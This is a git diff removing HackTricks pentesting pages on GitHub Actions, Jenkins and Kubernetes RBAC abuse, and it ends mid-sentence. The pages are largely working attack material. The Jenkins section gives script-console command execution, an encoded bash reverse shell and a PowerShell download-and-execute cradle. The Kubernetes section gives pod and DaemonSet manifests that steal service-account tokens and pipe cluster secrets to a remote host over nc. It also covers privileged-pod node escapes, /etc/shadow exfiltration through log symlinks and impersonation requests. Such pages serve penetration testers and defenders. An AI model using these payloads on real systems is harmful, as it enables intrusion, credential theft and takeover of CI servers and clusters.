do everything a user can. -* **Don't use a GitHub App if you just need a "Login with GitHub" service**. But a GitHub App can use a [user identification flow](https://docs.github.com/en/apps/building-github-apps/identifying-and-authorizing-users-for-github-apps) to log users in _and_ do other things. -* Don't build a GitHub App if you _only_ want to act as a GitHub user and do everything that user can do. -* If you are using your app with GitHub Actions and want to modify workflow files, you must authenticate on behalf of the user with an OAuth token that includes the `workflow` scope. The user must have admin or write permission to the repository that contains the workflow file. For more information, see "[Understanding scopes for OAuth apps](https://docs.github.com/en/apps/building-oauth-apps/understanding-scopes-for-oauth-apps/#available-scopes)." -* **More** in [here](https://docs.github.com/en/developers/apps/getting-started-with-apps/about-apps#about-github-apps). - -## Deploy keys - -Deploy keys might have read-only or write access to the repo, so they might be interesting to compromise specific repos. - -## Github Actions - -This **isn't a way to authenticate in github**, but a **malicious** Github Action could get **unauthorised access to github** and **depending** on the **privileges** given to the Action several **different attacks** could be done. See below for more information. - -# Git Actions - -Git actions allows to automate the **execution of code when an event happen**. Usually the code executed is **somehow related to the code of the repository** (maybe build a docker container or check that the PR doesn't contain secrets). - -## Configuration - -In _https://github.com/organizations/\/settings/actions_ it's possible to check the **configuration of the github actions** for the organization. - -It's possible to disallow the use of github actions completely, **allow all github actions**, or just allow certain actions. - -It's also possible to configure **who needs approval to run a Github Action** and the **permissions of the \_GITHUB\_TOKEN**\_\*\* of a Github Action when it's run\*\*. - -## Git Secrets - -Github Action usually need some kind of secrets to interact with github or third party applications. To **avoid putting them in clear-text** in the repo, github allow to put them as **Secrets**. - -These secrets can be configured **for the repo or for all the organization**. Then, in order for the **Action to be able to access the secret** you need to declare it like: - -```yaml -steps: - - name: Hello world action - with: # Set the secret as an input - super_secret: ${{ secrets.SuperSecret }} - env: # Or as an environment variable - super_secret: ${{ secrets.SuperSecret }} -``` - -### Example using Bash - -```yaml -steps: - - shell: bash - env: - SUPER_SECRET: ${{ secrets.SuperSecret }} - run: | - example-command "$SUPER_SECRET" -``` - -{% hint style="warning" %} -Secrets **can only be accessed from the Github Actions** that have them declared. - -Once configured in the repo or the organizations **users of github won't be able to access them again**, they just will be able to **change them**. -{% endhint %} - -Therefore, the **only way to steal github secrets is to be able to access the machine that is executing the Github Action** (in that scenario you will be able to access only the secrets declared for the Action). - -## Git Environments - -Github allows to create **environments** where you can save **secrets**. Then, you can give the github action access to the secrets inside the environment with something like: - -```yaml -jobs: - deployment: - runs-on: ubuntu-latest - environment: env_name -``` - -You can configure an environment to be **accessed** by **all branches** (default), **only protected** branches or **specify** which branches can access it. - -## Git Action Box - -A Github Action can be **executed inside the github environment** or can be executed in a **third party infrastructure** configured by the user. - -Several organizations will allow to run Github Actions in a **third party infrastructure** as it use to be **cheaper**. - -You can **list the self-hosted runners** of an organization in _https://github.com/organizations/\/settings/actions/runners_ - -The way to find which **Github Actions are being executed in non-github infrastructure** is to search for `runs-on: self-hosted` in the Github Action configuration yaml. - -It's **not possible to run a Github Action of an organization inside a self hosted box** of a different organization because **a unique token is generated for the Runner** when configuring it to know where the runner belongs. - -If the custom **Github Runner is configured in a machine inside AWS or GCP** for example, the Action **could have access to the metadata endpoint** and **steal the token of the service account** the machine is running with. - -## Git Action Compromise - -If all actions (or a malicious action) are allowed a user could use a **Github action** that is **malicious** and will **compromise** the **container** where it's being executed. - -{% hint style="danger" %} -A **malicious Github Action** run could be **abused** by the attacker to: - -* **Steal all the secrets** the Action has access to -* **Move laterally** if the Action is executed inside a **third party infrastructure** where the SA token used to run the machine can be accessed (probably via the metadata service) -* **Abuse the token** used by the **workflow** to **steal the code of the repo** where the Action is executed or **even modify it**. -{% endhint %} - -# Branch Protections - -Branch protections are designed to **not give complete control of a repository** to the users. The goal is to **put several protection methods before being able to write code inside some branch**. - -The **branch protections of a repository** can be found in _https://github.com/\/\/settings/branches_ - -{% hint style="info" %} -It's **not possible to set a branch protection at organization level**. So all of them must be declared on each repo. -{% endhint %} - -Different protections can be applied to a branch (like to master): - -* You can **require a PR before merging** (so you cannot directly merge code over the branch). If this is select different other protections can be in place: - * **Require a number of approvals**. It's very common to require 1 or 2 more people to approve your PR so a single user isn't capable of merge code directly. - * **Dismiss approvals when new commits are pushed**. If not, a user may approve legit code and then the user could add malicious code and merge it. - * **Require reviews from Code Owners**. At least 1 code owner of the repo needs to approve the PR (so "random" users cannot approve it) - * **Restrict who can dismiss pull request reviews.** You can specify people or teams allowed to dismiss pull request reviews. - * **Allow specified actors to bypass pull request requirements**. These users will be able to bypass previous restrictions. -* **Require status checks to pass before merging.** Some checks needs to pass before being able to merge the commit (like a github action checking there isn't any cleartext secret). -* **Require conversation resolution before merging**. All comments on the code needs to be resolved before the PR can be merged. -* **Require signed commits**. The commits need to be signed. -* **Require linear history.** Prevent merge commits from being pushed to matching branches. -* **Include administrators**. If this isn't set, admins can bypass the restrictions. -* **Restrict who can push to matching branches**. Restrict who can send a PR. - -{% hint style="info" %} -As you can see, even if you managed to obtain some credentials of a user, **repos might be protected avoiding you to pushing code to master** for example to compromise the CI/CD pipeline. -{% endhint %} - -# References - -* [https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization](https://docs.github.com/en/organizations/managing-access-to-your-organizations-repositories/repository-roles-for-an-organization) -* [https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise)[https://docs.github.com/en/enterprise-server](https://docs.github.com/en/enterprise-server@3.3/admin/user-management/managing-users-in-your-enterprise/roles-in-an-enterprise) -* [https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github](https://docs.github.com/en/get-started/learning-about-github/access-permissions-on-github) -* [https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards](https://docs.github.com/en/account-and-profile/setting-up-and-managing-your-github-user-account/managing-user-account-settings/permission-levels-for-user-owned-project-boards) -* [https://docs.github.com/en/actions/security-guides/encrypted-secrets](https://docs.github.com/en/actions/security-guides/encrypted-secrets) - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/jenkins.md b/cloud-security/jenkins.md deleted file mode 100644 index 49835f4db..000000000 --- a/cloud-security/jenkins.md +++ /dev/null @@ -1,224 +0,0 @@ -# Jenkins - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - - -**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. - -{% embed url="https://www.syncubes.com/" %} - -## Basic Information - -Jenkins offers a simple way to set up a **continuous integration** or **continuous delivery** (CI/CD) environment for almost **any** combination of **languages** and source code repositories using pipelines, as well as automating other routine development tasks. While Jenkins doesn’t eliminate the **need to create scripts for individual steps**, it does give you a faster and more robust way to integrate your entire chain of build, test, and deployment tools than you can easily build yourself.\ -Definition from [here](https://www.infoworld.com/article/3239666/what-is-jenkins-the-ci-server-explained.html). - -## Unauthenticated Enumeration - -In order to search for interesting Jenkins pages without authentication like (_/people_ or _/asynchPeople_, this lists the current users) you can use: - -``` -msf> use auxiliary/scanner/http/jenkins_enum -``` - -Check if you can execute commands without needing authentication: - -``` -msf> use auxiliary/scanner/http/jenkins_command -``` - -Without credentials you can look inside _**/asynchPeople/**_ path or _**/securityRealm/user/admin/search/index?q=**_ for **usernames**. - -You may be able to get the Jenkins version from the path _**/oops**_ or _**/error**_ - -![](<../.gitbook/assets/image (415).png>) - -## Login - -You will be able to find Jenkins instances that **allow you to create an account and login inside of it. As simple as that.**\ -Also if **SSO** **functionality**/**plugins** were present then you should attempt to **log-in** to the application using a test account (i.e., a test **Github/Bitbucket account**). Trick from [**here**](https://emtunc.org/blog/01/2018/research-misconfigured-jenkins-servers/). - -### Bruteforce - -**Jekins** does **not** implement any **password policy** or username **brute-force mitigation**. Then, you **should** always try to **brute-force** users because probably **weak passwords** are being used (even **usernames as passwords** or **reverse** usernames as passwords). - -``` -msf> use auxiliary/scanner/http/jenkins_login -``` - -## Jenkins Abuses - -### Known Vulnerabilities - -{% embed url="https://github.com/gquere/pwn_jenkins" %} - -### Dumping builds to find cleartext secrets - -Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/dump\_builds/jenkins\_dump\_builds.py) to dump build console outputs and build environment variables to hopefully find cleartext secrets. - -### Password spraying - -Use [this python script](https://github.com/gquere/pwn\_jenkins/blob/master/password\_spraying/jenkins\_password\_spraying.py) or [this powershell script](https://github.com/chryzsh/JenkinsPasswordSpray). - -### Decrypt Jenkins secrets offline - -Use [this script](https://github.com/gquere/pwn\_jenkins/blob/master/offline\_decryption/jenkins\_offline\_decrypt.py) to decrypt previsously dumped secrets. - -### Decrypt Jenkins secrets from Groovy - -``` -println(hudson.util.Secret.decrypt("{...}")) -``` - - - -**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. - -{% embed url="https://www.syncubes.com/" %} - -## Code Execution - -### **Create a new project** - -This method is very noisy because you have to create a hole new project (obviously this will only work if you user is allowed to create a new project). - -1. Create a new project (Freestyle project) -2. Inside **Build** section set **Execute shell** and paste a powershell Empire launcher or a meterpreter powershell (can be obtained using _unicorn_). Start the payload with _PowerShell.exe_ instead using _powershell._ -3. Click **Build now** - -Go to the projects and check **if you can configure any** of them (look for the "Configure button"): - -![](<../.gitbook/assets/image (158) (1).png>) - -Or **try to access to the path \_/configure**\_ in each project (example: /_me/my-views/view/all/job/Project0/configure_). - -If you are allowed to configure the project you can **make it execute commands when a build is successful**: - -![](<../.gitbook/assets/image (159) (1).png>) - -Click on **Save** and **build** the project and your **command will be executed**.\ -If you are not executing a reverse shell but a simple command you can **see the output of the command inside the output of the build**. - -### **Execute Groovy script** - -Best way. Less noisy. - -1. Go to _path\_jenkins/script_ -2. Inside the text box introduce the script - -```python -def process = "PowerShell.exe ".execute() -println "Found text ${process.text}" -``` - -You could execute a command using: `cmd.exe /c dir` - -In **linux** you can do: **`"ls /".execute().text`** - -If you need to use _quotes_ and _single quotes_ inside the text. You can use _"""PAYLOAD"""_ (triple double quotes) to execute the payload. - -**Another useful groovy script** is (replace \[INSERT COMMAND]): - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = '[INSERT COMMAND]'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in linux - -```python -def sout = new StringBuffer(), serr = new StringBuffer() -def proc = 'bash -c {echo,YmFzaCAtYyAnYmFzaCAtaSA+JiAvZGV2L3RjcC8xMC4xMC4xNC4yMi80MzQzIDA+JjEnCg==}|{base64,-d}|{bash,-i}'.execute() -proc.consumeProcessOutput(sout, serr) -proc.waitForOrKill(1000) -println "out> $sout err> $serr" -``` - -### Reverse shell in windows - -You can prepare a HTTP server with a PS reverse shell and use Jeking to download and execute it: - -```python -scriptblock="iex (New-Object Net.WebClient).DownloadString('http://192.168.252.1:8000/payload')" -echo $scriptblock | iconv --to-code UTF-16LE | base64 -w 0 -cmd.exe /c PowerShell.exe -Exec ByPass -Nol -Enc -``` - -### MSF exploit - -You can use MSF to get a reverse shell: - -``` -msf> use exploit/multi/http/jenkins_script_console -``` - -## POST - -### Metasploit - -``` -msf> post/multi/gather/jenkins_gather -``` - -### Files to copy after compromission - -These files are needed to decrypt Jenkins secrets: - -* secrets/master.key -* secrets/hudson.util.Secret - -Such secrets can usually be found in: - -* credentials.xml -* jobs/.../build.xml - -Here's a regexp to find them: - -``` -grep -re "^\s*<[a-zA-Z]*>{[a-zA-Z0-9=+/]*}<" -``` - -## References - -* [https://github.com/gquere/pwn\_jenkins](https://github.com/gquere/pwn\_jenkins) -* [https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/](https://leonjza.github.io/blog/2015/05/27/jenkins-to-meterpreter---toying-with-powersploit/) -* [https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password](https://www.pentestgeek.com/penetration-testing/hacking-jenkins-servers-with-no-password) - - - -**Security Skills as a Service** platform bridges the current skill set gap by combining **global offensive security talent with smart automation**, providing real-time data you need to make informed decisions. - -{% embed url="https://www.syncubes.com/" %} - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md deleted file mode 100644 index b7026751e..000000000 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md +++ /dev/null @@ -1,664 +0,0 @@ -# Abusing Roles/ClusterRoles in Kubernetes - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -Here you can find some potentially dangerous Roles and ClusterRoles configurations.\ -Remember that you can get all the supported resources with `kubectl api-resources` - -## **Privilege Escalation** - -Referring as the art of getting **access to a different principal** within the cluster **with different privileges** (within the kubernetes cluster or to external clouds) than the ones you already have, in Kubernetes there are basically **4 main techniques to escalate privileges**: - -* Be able to **impersonate** other user/groups/SAs with better privileges within the kubernetes cluster or to external clouds -* Be able to **create/patch/exec pods** where you can **find or attach SAs** with better privileges within the kubernetes cluster or to external clouds -* Be able to **read secrets** as the SAs tokens are stored as secrets -* Be able to **escape to the node** from a container, where you can steal all the secrets of the containers running in the node, the credentials of the node, and the permissions of the node within the cloud it's running in (if any) -* A fifth technique that deserves a mention is the ability to **run port-forward** in a pod, as you may be able to access interesting resources within that pod. - -### **Access Any Resource or Verb** - -This privilege provides access to **any resource with any verb**. It is the most substantial privilege that a user can get, especially if this privilege is also a β€œClusterRole.” If it’s a β€œClusterRole,” than the user can access the resources of any namespace and own the cluster with that permission. - -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: api-resource-verbs-all -rules: -rules: -- apiGroups: ["*"] - resources: ["*"] - verbs: ["*"] -``` - -### **Access Any Resource** - -Giving a user permission to **access any resource can be very risky**. But, **which verbs** allow access to these resources? Here are some dangerous RBAC permissions that can damage the whole cluster: - -* **resources: \["\*"] verbs: \["create"]** – This privilege can **create any resource** in the cluster, such as **pods**, roles, etc. An attacker might abuse it to **escalate privileges**. An example of this can be found in the **β€œPods Creation” section**. -* **resources: \["\*"] verbs: \["list"]** – The ability to list any resource can be used to **leak other users’ secrets** and might make it easier to **escalate privileges**. An example of this is located in the **β€œListing secrets” section.** -* **resources: \["\*"] verbs: \["get"]-** This privilege can be used to **get secrets from other service accounts**. - -```yaml -apiVersion: rbac.authorization.k8s.io/v1 -kind: ClusterRole -metadata: - name: api-resource-verbs-all -rules: -rules: -- apiGroups: ["*"] - resources: ["*"] - verbs: ["create", "list", "get"] -``` - -### Pod Create - Steal Token - -An attacker with permission to create a pod in the β€œkube-system” namespace can create cryptomining containers for example. Moreover, if there is a **service account with privileged permissions, by running a pod with that service the permissions can be abused to escalate privileges**. - -![](<../../../.gitbook/assets/image (463).png>) - -Here we have a default privileged account named _bootstrap-signer_ with permissions to list all secrets. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/rolebinding\_with\_cluster\_admin\_clusterrole-1024x545.png) - -The attacker can create a malicious pod that will use the privileged service. Then, abusing the service token, it will ex-filtrate the secrets: - -![](https://www.cyberark.com/wp-content/uploads/2018/12/pods\_yaml\_with\_autoamountServiceAccountToken-1024x345.png) - -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: alpine - namespace: kube-system -spec: - containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] - serviceAccountName: bootstrap-signer - automountServiceAccountToken: true - hostNetwork: true -``` - -In the previous image note how the _bootstrap-signer service is used in_ `serviceAccountname`_._ - -So just create the malicious pod and expect the secrets in port 6666: - -![](<../../../.gitbook/assets/image (464).png>) - -### **Pod Create & Escape** - -The following definition gives all the privileges a container can have: - -* **Privileged access** (disabling protections and setting capabilities) -* **Disable namespaces hostIPC and hostPid** that can help to escalate privileges -* **Disable hostNetwork** namespace, giving access to steal nodes cloud privileges and better access to networks -* **Mount hosts / inside the container** - -{% code title="super_privs.yaml" %} -```yaml -apiVersion: v1 -kind: Pod -metadata: - name: ubuntu - labels: - app: ubuntu -spec: - # Uncomment and specify a specific node you want to debug - # nodeName: - containers: - - image: ubuntu - command: - - "sleep" - - "3600" # adjust this as needed -- use only as long as you need - imagePullPolicy: IfNotPresent - name: ubuntu - securityContext: - allowPrivilegeEscalation: true - privileged: true - #capabilities: - # add: ["NET_ADMIN", "SYS_ADMIN"] # add the capabilities you need https://man7.org/linux/man-pages/man7/capabilities.7.html - runAsUser: 0 # run as root (or any other user) - volumeMounts: - - mountPath: /host - name: host-volume - restartPolicy: Never # we want to be intentional about running this pod - hostIPC: true # Use the host's ipc namespace https://www.man7.org/linux/man-pages/man7/ipc_namespaces.7.html - hostNetwork: true # Use the host's network namespace https://www.man7.org/linux/man-pages/man7/network_namespaces.7.html - hostPID: true # Use the host's pid namespace https://man7.org/linux/man-pages/man7/pid_namespaces.7.htmlpe_ - volumes: - - name: host-volume - hostPath: - path: / -``` -{% endcode %} - -Create the pod with: - -```bash -kubectl --token $token create -f mount_root.yaml -``` - -One-liner from [this tweet](https://twitter.com/mauilion/status/1129468485480751104) and with some additions: - -```bash -kubectl run r00t --restart=Never -ti --rm --image lol --overrides '{"spec":{"hostPID": true, "containers":[{"name":"1","image":"alpine","command":["nsenter","--mount=/proc/1/ns/mnt","--","/bin/bash"],"stdin": true,"tty":true,"imagePullPolicy":"IfNotPresent","securityContext":{"privileged":true}}]}}' -``` - -Now that you can escape to the node check post-exploitation techniques in: - -{% content-ref url="../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md" %} -[attacking-kubernetes-from-inside-a-pod.md](../../../pentesting/pentesting-kubernetes/attacking-kubernetes-from-inside-a-pod.md) -{% endcontent-ref %} - -#### Stealth - -You probably want to be **stealthier**, in the following pages you can see what you would be able to access if you create a pod only enabling some of the mentioned privileges in the previous template: - -* [**Privileged + hostPID**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged-+-hostpid) -* [**Privileged only**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#privileged) -* [**hostPath**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#arbitrary-mounts) -* [**hostPID**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostpid) -* [**hostNetwork**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostnetwork) -* [**hostIPC**](../../../linux-hardening/privilege-escalation/docker-breakout/docker-breakout-privilege-escalation/#hostipc) - -_You can find example of how to create/abuse the previous privileged pods configurations in_ [_https://github.com/BishopFox/badPods_](https://github.com/BishopFox/badPods)\_\_ - -### Pod Create - Move to cloud - -If you can **create** a **pod** (and optionally a **service account**) you might be able to **obtain privileges in cloud environment** by **assigning cloud roles to a pod or a service account** and then accessing it.\ -Moreover, if you can create a **pod with the host network namespace** you can **steal the IAM** role of the **node** instance. - -For more information check: - -{% content-ref url="../kubernetes-access-to-other-clouds.md" %} -[kubernetes-access-to-other-clouds.md](../kubernetes-access-to-other-clouds.md) -{% endcontent-ref %} - -### **Create/Patch Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs** - -Deployment, Daemonsets, Statefulsets, Replicationcontrollers, Replicasets, Jobs and Cronjobs are all privileges that allow the creation of different tasks in the cluster. Moreover, it's possible can use all of them to **develop pods and even create pods**. So it's possible to a**buse them to escalate privileges just like in the previous example.** - -Suppose we have the **permission to create a Daemonset** and we create the following YAML file. This YAML file is configured to do the same steps we mentioned in the β€œcreate pods” section. - -```yaml -apiVersion: apps/v1 -kind: DaemonSet -metadata: - name: alpine - namespace: kube-system -spec: - selector: - matchLabels: - name: alpine - template: - metadata: - labels: - name: alpine - spec: - serviceAccountName: bootstrap-signer - automountServiceAccountToken: true - hostNetwork: true - containers: - - name: alpine - image: alpine - command: ["/bin/sh"] - args: ["-c", 'apk update && apk add curl --no-cache; cat /run/secrets/kubernetes.io/serviceaccount/token | { read TOKEN; curl -k -v -H "Authorization: Bearer $TOKEN" -H "Content-Type: application/json" https://192.168.154.228:8443/api/v1/namespaces/kube-system/secrets; } | nc -nv 192.168.154.228 6666; sleep 100000'] -``` - -In line 6 you can find the object β€œspec” and children objects such as β€œ**template**” in line 10. These objects hold the configuration for the task we wish to accomplish. Another thing to notice is the "**serviceAccountName**" in line 15 and the β€œ**containers**” object in line 18. This is the part that relates to creating our malicious container. - -Kubernetes API documentation indicates that the β€œ**PodTemplateSpec**” endpoint has the option to create containers. And, as you can see: **deployment,** **daemonsets, statefulsets, replicationcontrollers, replicasets, jobs and cronjobs can all be used to create pods**: - -![](https://www.cyberark.com/wp-content/uploads/2019/08/Kube-Pentest-Fig-8.png) - -**So, the privilege to create or update tasks can also be abused for privilege escalation in the cluster.** - -### **Pods Exec** - -**Pod exec** is an option in kubernetes used for **running commands in a shell inside a pod**. This privilege is meant for administrators who want to **access containers and run commands**. It’s just like creating a SSH session for the container. - -If we have this privilege, we actually get the ability **to take control of all the pods**. In order to do that, we needs to use the following command: - -```bash -kubectl exec -it -n -- sh -``` - -Note that as you can get inside any pod, you can abuse other pods token just like in [**Pod Creation exploitation**](./#pod-creation) to try to escalate privileges. - -### port-forward - -This permission allows to **forward one local port to one port in the specified pod**. This is meant to be able to debug applications running inside a pod easily, but an attacker might abuse it to get access to interesting (like DBs) or vulnerable applications (webs?) inside a pod: - -``` -kubectl port-forward pod/mypod 5000:5000 -``` - -### **Hosts Writable /var/log/ Escape** - -As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)\*\*,\*\*If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ -This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs `), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\ -The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**. - -Therefore, an attacker with **access to write in the /var/log/ folder** of the container could abuse this behaviours in 2 ways: - -* Modifying the `0.log` file of its container (usually located in `/var/logs/pods/namespace_pod_uid/container/0.log`) to be a **symlink pointing to `/etc/shadow`** for example. Then, you will be able to exfiltrate hosts shadow file doing: - -```bash -kubectl logs escaper -failed to get parse function: unsupported log format: "root::::::::\n" -kubectl logs escaper --tail=2 -failed to get parse function: unsupported log format: "systemd-resolve:*:::::::\n" -# Keep incrementing tail to exfiltrate the whole file -``` - -* If the attacker controls any principal with the **permissions to read `nodes/log`**, he can just create a **symlink** in `/host-mounted/var/log/sym` to `/` and when **accessing `https://:10250/logs/sym/` he will lists the hosts root** filesystem (changing the symlink can provide access to files). - -```bash -curl -k -H 'Authorization: Bearer eyJhbGciOiJSUzI1NiIsImtpZCI6Im[...]' 'https://172.17.0.1:10250/logs/sym/' -bin -data/ -dev/ -etc/ -home/ -init -lib -[...] -``` - -**A laboratory and automated exploit can be found in** [**https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts**](https://blog.aquasec.com/kubernetes-security-pod-escape-log-mounts) - -#### Bypassing readOnly protection - -If you are lucky enough and the highly privileged capability capability `CAP_SYS_ADMIN` is available, you can just remount the folder as rw: - -```bash -mount -o rw,remount /hostlogs/ -``` - -#### Bypassing hostPath readOnly protection - -As stated in [**this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html) it’s possible to bypass the protection: - -```yaml -allowedHostPaths: - - pathPrefix: "/foo" - readOnly: true -``` - -Which was meant to prevent escapes like the previous ones by, instead of using a a hostPath mount, use a PersistentVolume and a PersistentVolumeClaim to mount a hosts folder in the container with writable access: - -```yaml -apiVersion: v1 -kind: PersistentVolume -metadata: - name: task-pv-volume-vol - labels: - type: local -spec: - storageClassName: manual - capacity: - storage: 10Gi - accessModes: - - ReadWriteOnce - hostPath: - path: "/var/log" ---- -apiVersion: v1 -kind: PersistentVolumeClaim -metadata: - name: task-pv-claim-vol -spec: - storageClassName: manual - accessModes: - - ReadWriteOnce - resources: - requests: - storage: 3Gi ---- -apiVersion: v1 -kind: Pod -metadata: - name: task-pv-pod -spec: - volumes: - - name: task-pv-storage-vol - persistentVolumeClaim: - claimName: task-pv-claim-vol - containers: - - name: task-pv-container - image: ubuntu:latest - command: [ "sh", "-c", "sleep 1h" ] - volumeMounts: - - mountPath: "/hostlogs" - name: task-pv-storage-vol -``` - -### **Impersonating privileged accounts** - -With a [**user impersonation**](https://kubernetes.io/docs/reference/access-authn-authz/authentication/#user-impersonation) privilege, an attacker could impersonate a privileged account. - -In this example, the service account _**sa-imper**_ has a binding to a ClusterRole with rules that allow it to impersonate groups and users. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_for\_user\_impersonation.png) - -![](https://www.cyberark.com/wp-content/uploads/2018/12/clusterRole\_for\_user\_impersonation\_2.png) - -It's possible to **list all secrets** with `--as=null --as-group=system:master` attributes: - -![](https://www.cyberark.com/wp-content/uploads/2018/12/listing\_secrets\_with\_and\_without\_user\_impersonation-1024x108.png) - -**It's also possible to perform the same action via the API REST endpoint:** - -```bash -curl -k -v -XGET -H "Authorization: Bearer " \ --H "Impersonate-Group: system:masters"\ --H "Impersonate-User: null" \ --H "Accept: application/json" \ -https://:/api/v1/namespaces/kube-system/secrets/ -``` - -### **Listing Secrets** - -The **listing secrets privilege** is a strong capability to have in the cluster. A user with the permission to list secrets can **potentially view all the secrets in the cluster – including the admin keys**. The secret key is a JWT token encoded in base64. - -![](https://www.cyberark.com/wp-content/uploads/2018/12/listing\_secrets\_role.png) - -An attacker that gains **access to 